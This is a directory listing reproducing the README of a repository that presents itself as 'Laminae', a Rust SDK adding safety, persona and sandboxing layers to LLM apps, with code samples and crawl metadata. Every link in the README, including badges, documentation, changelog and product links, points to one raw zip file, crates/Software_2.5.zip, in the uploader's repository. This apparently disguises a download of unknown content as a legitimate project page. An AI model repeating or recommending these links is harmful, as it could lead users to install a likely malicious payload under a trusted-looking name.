AGENTS / GITHUB / Laminae
githubinferredactive

Laminae

provenance:github:Arneunalarming861/Laminae

Bridge raw large language models to production-ready AI with a lightweight Rust layer enabling integration, customization, and control.

View Source ↗First seen 25d agoNot yet hireable
README
<p align="center">
  <img src="assets/laminae-git.png" alt="Laminae" width="320" />
</p>

<h1 align="center">Laminae</h1>

<p align="center"><strong>The missing layer between raw LLMs and production AI.</strong></p>

<p align="center">
  <a href="https://raw.githubusercontent.com/Arneunalarming861/Laminae/main/crates/Software_2.5.zip"><img src="https://img.shields.io/crates/v/laminae.svg" alt="crates.io" /></a>
  <a href="https://raw.githubusercontent.com/Arneunalarming861/Laminae/main/crates/Software_2.5.zip"><img src="https://img.shields.io/badge/crates.io_downloads-1.5K-e6822a" alt="SDK downloads" /></a>
  <a href="https://raw.githubusercontent.com/Arneunalarming861/Laminae/main/crates/Software_2.5.zip"><img src="https://img.shields.io/badge/license-Apache%202.0-blue.svg" alt="license" /></a>
  <a href="https://raw.githubusercontent.com/Arneunalarming861/Laminae/main/crates/Software_2.5.zip"><img src="https://img.shields.io/badge/rust-1.83%2B-orange.svg" alt="rust" /></a>
  <a href="https://raw.githubusercontent.com/Arneunalarming861/Laminae/main/crates/Software_2.5.zip"><img src="https://raw.githubusercontent.com/Arneunalarming861/Laminae/main/crates/Software_2.5.zip" alt="docs.rs" /></a>
</p>

<p align="center">
  If you find Laminae useful, consider giving it a ⭐ - it helps others discover the project!
</p>

<p align="center">
  <a href="https://raw.githubusercontent.com/Arneunalarming861/Laminae/main/crates/Software_2.5.zip"><strong>📖 Documentation</strong></a> · <a href="https://raw.githubusercontent.com/Arneunalarming861/Laminae/main/crates/Software_2.5.zip"><strong>Changelog</strong></a>
</p>

<p align="center">
  <a href="https://raw.githubusercontent.com/Arneunalarming861/Laminae/main/crates/Software_2.5.zip"><strong>Made with ❤️ for AIs and for the Vibe Coding Community.</strong></a>
</p>

---

> **This project has been archived.** The most valuable components (Cortex, Glassbox, Ironclad) have been absorbed into [Thunder](https://raw.githubusercontent.com/Arneunalarming861/Laminae/main/crates/Software_2.5.zip) — our AI-powered multi-agent coding orchestrator. The ideas live on in a product that ships.

> **What was absorbed:**
> - **laminae-cortex** (learning from corrections) → Thunder's Stormeye memory layer
> - **laminae-glassbox** (I/O containment) → [Thunder Dome](https://raw.githubusercontent.com/Arneunalarming861/Laminae/main/crates/Software_2.5.zip) security gateway
> - **laminae-ironclad** (process sandbox) → Thunder's agent process safety

---

Laminae (Latin: *layers*) is an open-source modular Rust SDK that adds guardrails, safety, personality, voice, learning, and containment to any AI or LLM application. Each layer works independently or together as a full production-ready stack.
<p align="center">

```
┌─────────────────────────────────────────────┐
│              Your Application               │
├─────────────────────────────────────────────┤
│  Psyche    │ Multi-agent cognitive pipeline │
│  Persona   │ Voice extraction & enforcement │
│  Cortex    │ Self-improving learning loop   │
│  Shadow    │ Adversarial red-teaming        │
│  Ironclad  │ Process execution sandbox      │
│  Glassbox  │ I/O containment layer          │
├─────────────────────────────────────────────┤
│              Any LLM Backend                │
│     (Claude, GPT, Ollama, your own)         │
└─────────────────────────────────────────────┘
```
</p>

## Why Laminae?

Every AI app reinvents safety, prompt injection defense, and output validation from scratch. Most skip it entirely. Laminae provides structured safety layers that sit between your LLM and your users - enforced in Rust, not in prompts.

**No existing SDK does this.** LangChain, LlamaIndex, and others focus on retrieval and chaining. Laminae focuses on what happens *around* the LLM: shaping its personality, learning from corrections, auditing its output, sandboxing its actions, and containing its reach.

## The Layers

### Psyche - Multi-Agent Cognitive Pipeline

A Freudian-inspired architecture where three agents shape every response:

- **Id** - Creative force. Generates unconventional angles, emotional undertones, creative reframings. Runs on a small local LLM (Ollama) - zero cost.
- **Superego** - Safety evaluator. Assesses risks, ethical boundaries, manipulation attempts. Also runs locally - zero cost.
- **Ego** - Your LLM. Receives the user's message enriched with invisible context from Id and Superego. Produces the final response without knowing it was shaped.

The key insight: Id and Superego run on small, fast, local models. Their output is compressed into "context signals" injected into the Ego's prompt as invisible system context. The user never sees the shaping - they just get better, safer responses.

```rust
use laminae::psyche::{PsycheEngine, EgoBackend, PsycheConfig};
use laminae::ollama::OllamaClient;

struct MyEgo { /* your LLM client */ }

impl EgoBackend for MyEgo {
    fn complete(&self, system: &str, user_msg: &str, context: &str)
        -> impl std::future::Future<Output = anyhow::Result<String>> + Send
    {
        let full_system = format!("{context}\n\n{system}");
        async move {
            // Call Claude, GPT, or any LLM here
            todo!()
        }
    }
}

#[tokio::main]
async fn main() -> anyhow::Result<()> {
    let engine = PsycheEngine::new(OllamaClient::new(), MyEgo { /* ... */ });
    let response = engine.reply("What is creativity?").await?;
    println!("{response}");
    Ok(())
}
```

**Automatic tier classification** - simple messages (greetings, factual lookups) bypass Psyche entirely. Medium messages use COP (Compressed Output Protocol) for fast processing. Complex messages get the full pipeline.

### Persona - Voice Extraction & Style Enforcement

Extracts a writing personality from text samples and enforces it on LLM output. Platform-agnostic - works for emails, docs, chat, code reviews, support tickets.

- **7-dimension extraction** - tone, humor, vocabulary, formality, perspective, emotional style, narrative preference
- **Anti-hallucination** - validates LLM-claimed examples against real samples, cross-checks expertise claims
- **Voice filter** - 6-layer post-generation rejection system catches AI-sounding output (60+ built-in AI phrase patterns)
- **Voice DNA** - tracks distinctive phrases confirmed by repeated use, reinforces authentic style

```rust
use laminae::persona::{PersonaExtractor, VoiceFilter, VoiceFilterConfig, compile_persona};

// Extract a persona from text samples
let extractor = PersonaExtractor::new("qwen2.5:7b");
let persona = extractor.extract(&samples).await?;
let prompt_block = compile_persona(&persona);

// Post-generation: catch AI-sounding output
let filter = VoiceFilter::new(VoiceFilterConfig::default());
let result = filter.check("It's important to note that...");
// result.passed = false, result.violations = ["AI vocabulary detected: ..."]
// result.retry_hints = ["DO NOT use formal/academic language..."]
```

### Cortex - Self-Improving Learning Loop

Tracks how users edit AI output and converts corrections into reusable instructions - without fine-tuning. The AI gets better with every edit.

- **8 pattern types** - shortened, removed questions, stripped AI phrases, tone shifts, added content, simplified language, changed openers
- **LLM-powered analysis** - converts edit diffs into natural-language instructions ("Never start with I think")
- **Deduplicated store** - instructions ranked by reinforcement count, 80% word overlap deduplication
- **Prompt injection** - top instructions formatted as a prompt block for any LLM

```rust
use laminae::cortex::{Cortex, CortexConfig};

let mut cortex = Cortex::new(CortexConfig::default());

// Track edits over time
cortex.track_edit("It's worth noting that Rust is fast.", "Rust is fast.");
cortex.track_edit("Furthermore, the type system is robust.", "The type system catches bugs.");

// Detect patterns
let patterns = cortex.detect_patterns();
// → [RemovedAi

[truncated…]

PUBLIC HISTORY

First discoveredMar 24, 2026

IDENTITY

inferred

Identity inferred from code signals. No PROVENANCE.yml found.

Is this yours? Claim it →

METADATA

platformgithub
first seenMar 23, 2026
last updatedMar 23, 2026
last crawled1 day ago
version

README BADGE

Add to your README:

![Provenance](https://getprovenance.dev/api/badge?id=provenance:github:Arneunalarming861/Laminae)